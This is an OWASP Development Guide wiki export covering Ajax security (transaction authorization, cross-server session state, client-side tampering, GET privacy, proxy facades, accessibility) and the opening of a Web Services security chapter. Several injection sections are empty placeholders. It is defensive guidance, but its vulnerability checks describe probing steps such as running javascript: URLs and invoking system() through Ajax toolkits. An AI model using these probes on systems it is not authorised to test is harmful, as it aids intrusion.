==Silent transactional authorization ==&lt;br /&gt;
&lt;br /&gt;
Any system that silently processes transactions using a single submission is dangerous to the client. For example, if a normal web application allows a simple URL submission, a preset session attack will allow the attacker to complete a transaction without the user’s authorization. In Ajax, it gets worse: the transaction is silent; it happens with no user feedback on the page, so an injected attack script may be able to steal money from the client without authorization. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
Determine if the application:&lt;br /&gt;
&lt;br /&gt;
* Is vulnerable to DOM injection and can run arbitrary JavaScript&lt;br /&gt;
&lt;br /&gt;
* If the browser allows execution of loaded JavaScript via URL entry, by navigating to the transaction submission page, and then typing in javascript:function(args). If the JavaScript is executed, it is likely that spyware will also be able to execute this code via the DOM model&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Ensure that all transactions are conducted with appropriate authorization, including transaction signing as necessary&lt;br /&gt;
&lt;br /&gt;
==Untrusted or absent session data ==&lt;br /&gt;
&lt;br /&gt;
A common mis-implementation with Ajax is the desire to call a second server. &lt;br /&gt;
&lt;br /&gt;
[[Image:Ajax Second Server.gif]]&lt;br /&gt;
&lt;br /&gt;
Session data on the first server usually contains relatively trustworthy authentication and authorization information, as well as sensitive state, but in general, the second server cannot access this information in a timely or safe fashion. &lt;br /&gt;
&lt;br /&gt;
An example includes running an Ajax application on &amp;lt;u&amp;gt;http://www.example.com&amp;lt;/u&amp;gt;, and the Ajax code is able to directly process share trades on &amp;lt;u&amp;gt;http://market.somebiginvestmentfirm.com/&amp;lt;/u&amp;gt; via the use of embedded trust or embedded credentials. &lt;br /&gt;
&lt;br /&gt;
Attackers will be able to fraudulently perform transactions if there is no shared state between the two systems. This attack only requires that the attackers can tamper with embedded state on the client and if market.somebiginvestmentfirm.com foolishly trusts calls from Ajax callers without first checking with example.com. However, if example.com is simply one of hundreds of brokers, then this scenario is very unlikely to be secure no matter how it’s sliced or diced. This particular scenario requires federated identity, which is discussed further in the Authentication chapter.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
You are vulnerable to this issue if:&lt;br /&gt;
&lt;br /&gt;
* Sensitive state is passed through the client to the second server in the foolish hope it will be trusted by the second server&lt;br /&gt;
&lt;br /&gt;
* The Ajax endpoints are hosted on a different server with unsharable session state&lt;br /&gt;
&lt;br /&gt;
* The second server is addressed by a URL that would prevent the cookies from the first session being used by the second server. Most browsers do not allow an application running on &amp;lt;u&amp;gt;ws.example.com&amp;lt;/u&amp;gt; to read cookies from &amp;lt;u&amp;gt;www.example.com&amp;lt;/u&amp;gt;. However, browsers will allow cookies to be read from &amp;lt;u&amp;gt;http://example.com&amp;lt;/u&amp;gt; but you should not rely on this as an attacker may spoof another URL such as attack.example.com and set cookies for example.com. &lt;br /&gt;
&lt;br /&gt;
* If the web service or other endpoint cannot obtain data from the first server’s session state for any other reason (such as incompatible technologies, like running a PHP web application and the Ajax application is trying to consume ASP.NET web services).&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
There are at least three methods to get around this issue:&lt;br /&gt;
&lt;br /&gt;
* Do not host the receiving end point on a different server; simply scale the entire application up (web services and all) on the same host. This allows trivially easy access to the trusted session state.&lt;br /&gt;
&lt;br /&gt;
* Stash the state in a database, and pass a cryptographically strong random key from the first server to the second server via the client. This method is far slower, more code intensive, and less scalable than the first solution.&lt;br /&gt;
&lt;br /&gt;
* Use federated authentication to provide a shared authorization context and verify it on the second server. This is usually very slow, but it is safe as long as the single sign-on (SSO) implementation is relatively secure and does not allow replay attacks.&lt;br /&gt;
&lt;br /&gt;
A solution that will not work is to simply pass the sensitive state via the client. A hostile client can tamper with the username, role, or any other sensitive state, so it cannot be trusted to transmit such data safely.&lt;br /&gt;
&lt;br /&gt;
==State management ==&lt;br /&gt;
&lt;br /&gt;
The DOM is designed to be manipulated and visible within the browser. It was never designed to be a secure storage area, but rather as a method of controlling how the page looks and behaves. Therefore, secure applications need to take care with client side storage of secure state.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
==Tamper resistance  ==&lt;br /&gt;
&lt;br /&gt;
If state is stored on the client, the attacker is able to easily manipulate this state using a DOM inspection tool, or simply by re-writing to their own API. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable: '''&lt;br /&gt;
&lt;br /&gt;
* Use DOM inspection tools like FireBug (https://addons.mozilla.org/firefox/1843/) – can you see client side state?&lt;br /&gt;
&lt;br /&gt;
* Can you change the state?&lt;br /&gt;
&lt;br /&gt;
* Use proxy tools, such as Paros, Spike Proxy, or WebScarab. When you see client-side state, can you modify it or inject interesting traffic? Does the server-side code detect the change in a reasonable way? &lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
* Do not obfuscate client side state for no purpose – this requires more code and is trivially bypassed by advanced attackers&lt;br /&gt;
&lt;br /&gt;
* Applications should maintain a copy of all client-side state, and only accept back state that the user is authorized to change, such as a form fields or settings which they can change in the web UI&lt;br /&gt;
&lt;br /&gt;
* Ensure that the action is authorized before performing any activity on submitted data&lt;br /&gt;
&lt;br /&gt;
* Include server-side validation, preferring white listing to blacklisting.&lt;br /&gt;
&lt;br /&gt;
==Privacy  ==&lt;br /&gt;
&lt;br /&gt;
Almost all Ajax clients use XMLHttpRequest with GET requests. These embed the data in the “URL”, and even though the data is generally not visible to the user, it is available in the browser history. &lt;br /&gt;
&lt;br /&gt;
Phishers favor GET requests. They love to use links embedded in e-mails. If coupled with poorly written code that does not assert authorization, such code will allow the phisher to commit an unauthorized transaction.&lt;br /&gt;
&lt;br /&gt;
Even if POSTs are used, private data can be cached in intermediate untrusted caches if the application uses HTTP rather than HTTPS connections. &lt;br /&gt;
&lt;br /&gt;
Most browsers have GET data limits, which can be as little as 2 KB. POSTs do not have this limitation, allowing far more data to be sent in any one request. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are at risk '''&lt;br /&gt;
&lt;br /&gt;
* Use a proxy tool, like Paros, Spike, or WebScarab to determine the mode of the Ajax interaction. If it is GET, you are potentially at risk.&lt;br /&gt;
&lt;br /&gt;
* Look at the data – does it contain details such as usernames, passwords, names, addresses, medical history, bank account, tax, or other private details? If so, you are at risk.&lt;br /&gt;
&lt;br /&gt;
* If you are sending sensitive data, can you access the Ajax endpoint via HTTP? If so, you are at risk from privacy breaches.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Generally, regardless of data value, use only POST requests. &lt;br /&gt;
&lt;br /&gt;
''CPaint POST transfer mode client example''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
var cp = new cpaint();&lt;br /&gt;
&lt;br /&gt;
cp.set_transfer_mode(‘POST’);'&lt;br /&gt;
&lt;br /&gt;
…&lt;br /&gt;
&lt;br /&gt;
cp.call(‘processCreditCard.php’, ‘setCCDetail’, document.getElementById(‘creditcardnumber’), document.getElementById(‘creditcardexpiry’),&lt;br /&gt;
&lt;br /&gt;
document.getElementById(‘ccv’));&lt;br /&gt;
&lt;br /&gt;
CPaint POST transfer mode server example&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php?  &lt;br /&gt;
&lt;br /&gt;
function setCCDetail($cc, $expiry, $ccv)&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
// check that the session is logged in ?&lt;br /&gt;
&lt;br /&gt;
	assert_login();&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
	// check that the user has the USER role to prevent &lt;br /&gt;
&lt;br /&gt;
// guest and admin access&lt;br /&gt;
&lt;br /&gt;
	assert_role(‘USER’);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// Validate data and business rules&lt;br /&gt;
&lt;br /&gt;
if ( is_credit_card($cc) &amp;amp;&amp;amp; is_expiry_date($expiry) &amp;amp;&amp;amp; is_numeric($ccv) )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
// Set the credit card details&lt;br /&gt;
&lt;br /&gt;
$this-&amp;gt;cc = $cc;&lt;br /&gt;
&lt;br /&gt;
$this-&amp;gt;exp = $expiry;&lt;br /&gt;
&lt;br /&gt;
$this-&amp;gt;ccv = $ccv;&lt;br /&gt;
&lt;br /&gt;
return true;&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// Data failed validation and business rules&lt;br /&gt;
&lt;br /&gt;
return false;&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Include server-side code that enforces the source of the data, so that it only comes from the POST, not from the request, GET, environment, or cookie data.&lt;br /&gt;
&lt;br /&gt;
If data transiting Ajax endpoints is protected by the users’ privacy laws, ensure that the data transits only over HTTPS using SSLv3 or TLS 1.0 or better and block HTTP communications.&lt;br /&gt;
&lt;br /&gt;
==Proxy Façade  ==&lt;br /&gt;
&lt;br /&gt;
Many toolkits, particularly PHP toolkits, allow you to register a class or file with the Ajax toolkit and thus call that method. CPaint for example works in this manner. However, some toolkits are worse than others – they allow '''any''' in context PHP function to be called, including system() and eval(). Others are not robust against PHP code injection – see below for more details.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
If your toolkit works by registering classes or functions, try:&lt;br /&gt;
&lt;br /&gt;
* Calling a system call, such as system() or printf()&lt;br /&gt;
&lt;br /&gt;
* Calling another function in your code, but one which has not been registered&lt;br /&gt;
&lt;br /&gt;
* Try using some of the language features, such as ` for PHP for example &lt;br /&gt;
&lt;br /&gt;
If any of these attacks work, your code (and any code using this framework) is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
In general, such methods of calling server side code are fraught with danger. It’s better to provide a limited interface, called a proxy façade, to only allow access to permitted functions. &lt;br /&gt;
&lt;br /&gt;
This would also allow authorization checks and basic validation to be performed before calling previously internal code. &lt;br /&gt;
&lt;br /&gt;
==SOAP Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==XMLRPC Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DOM Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==XML Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==JSON (JavaScript Object Notation) Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Encoding safety ==&lt;br /&gt;
&lt;br /&gt;
Ajax applications are particularly prone to encoding attacks as JavaScript understands several encodings (depending on the browser, locale and code page), whilst the scripting language itself is primitive when it comes to providing robust encoding and decoding utilities. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Do not rely heavily upon JavaScript processing the encoding or decoding capabilities for the client. Send data pre-encoded to the client, and receive data and handle it correctly. &lt;br /&gt;
&lt;br /&gt;
For more details, see the Canonicalization chapter later in this book.&lt;br /&gt;
&lt;br /&gt;
==Auditing ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Error Handling ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Accessibility ==&lt;br /&gt;
&lt;br /&gt;
Almost all Ajax toolkits and applications are inaccessible. Rarely do they pass even basic W3C WAI validation, and do not have accessible alternative paths. Some toolkits, such as Tibco General Interface, crash the browser if a larger text size is chosen. This is completely unacceptable and worse, completely preventable. Being a “rich” interface does not excuse disability requirements. Based upon the US Census conducted in 2000, around 19.1% of the total US population has a disability of some kind (with similar levels elsewhere on the planet). Locking out 20% of your potential users from using your application is unacceptable and is in fact, illegal in most countries. &lt;br /&gt;
&lt;br /&gt;
Nearly all Western disability discrimination laws are the same – they require accessibility unless it is a justifiable hardship. They do not distinguish between open source or closed source, for profit or charitable, government or corporate – their application is universal.&lt;br /&gt;
&lt;br /&gt;
The techniques for creating accessible applications are widely known and have been documented for more than ten years. Accessibility evaluation tools are included or available as an option in every web development environment. As it does not cost a great deal to write new software to be accessible (the primary cost is in the testing), it is never a justifiable hardship to be accessible. &lt;br /&gt;
&lt;br /&gt;
Over the last few years, case law has firmly solidified upon the side of the disabled (see the references, particularly the SOCOG / IBM decision). If you now deliberately write inaccessible software, it would be negligent in the same way that building new buildings without accessibility aides such as ramps and lifts to allow wheelchair access. This stuff is not rocket science, it does not cost a lot of money to do, and lastly, you may need it one day.&lt;br /&gt;
&lt;br /&gt;
'''How to identify if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
* Read the W3C WAI guidelines and ensure your application has alternate accessible paths, and adheres to basic accessibility guidelines.&lt;br /&gt;
&lt;br /&gt;
* Identify suitable evaluation tools for your development environment if it does not already contain them. Fix issues found by these tools and re-test.&lt;br /&gt;
&lt;br /&gt;
* Try using the basic accessibility tools built into your operating system to see if your code works in high contrast, different color schemes, resize the text elements in your browser (in Firefox use Control-+ key to do this, Text Size -&amp;gt; Larger in Internet Explorer 6.0 or use the zoom control on the bottom right of the screen in IE 7), (Windows specific) set the font resolution to high DPI to emulate large fonts, choose big default fonts in the browser, use the screen magnification tool, and test various basic screen readers. If your application fails any of these tests, you are vulnerable. &lt;br /&gt;
&lt;br /&gt;
* Once you are satisfied your application should have a reasonable shot at passing full testing, identify suitable accredited accessibility test firms or similarly qualified resources who can test your application using actual disability tools and provide qualified feedback. In general, unless your application is very simple, you should fix any issues found.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
* Develop with accessibility in mind. Just like security, the sooner you do it, the cheaper this activity becomes and the more likely your application will be accessible.&lt;br /&gt;
&lt;br /&gt;
* Test in house regularly. If possible, employ staff or volunteers who require such accessibility; they will let you know the best choices for full featured screen readers, Braille devices, and magnification and other accessibility aides. Let them test your application and provide feedback. &lt;br /&gt;
&lt;br /&gt;
* If you are likely to sell to corporate or government organizations, ensure that all applications are tested by an accredited accessibility testing firm. Fix all the issues they identify.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
AJAX Spell Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/13986/discuss&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
CPaint Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/14565/discuss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
XML-RPC Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/14088/discuss&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maguire vs SOCOG/IBM, Nublog&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.contenu.nu/socog.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
W3C, Existing accessibility tools&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w3.org/WAI/ER/existingtools.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
US Census 2000: Disability Status 2000&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.census.gov/prod/2003pubs/c2kbr-17.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:OWASP AJAX Security Project]]&lt;br /&gt;
[[Category:AJAX]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59472</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59472"/>
				<updated>2009-04-26T12:06:12Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* .NET – Web Service Extensions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address common issues. Due to the space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical that they are nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  Lets assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format.  A format that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in the clear-text form, at least – temporarily. Storing the transmitted information at the intermediate aggravates the problem or destination servers in log files (where it can be browsed by anybody) and local caches.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that the most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such approach, and make conscious trade-offs at the design time, whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherited risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or just never sent “in the clear”. Usual ways to avoid sending sensitive credentials are using cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” whereas server or clients' clocks drift too much, preventing timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may be expiring while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “whether I trust the caller,” “whether it created this message.” Assuming that the caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). This may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually some mechanisms like checksum applied to ensure packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably tracked back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or with secret key-encryption (assuming the keys are only known to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires conducting an extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – the traditional HTTP firewalls do not help at stopping attacks at the Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and make intelligent decision about passing SOAP messages to their destination. The reader would need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required from the audits, is reconstructing the chain of events that led to a certain problem. Normally, this would be achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as the WS are concerned, such level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
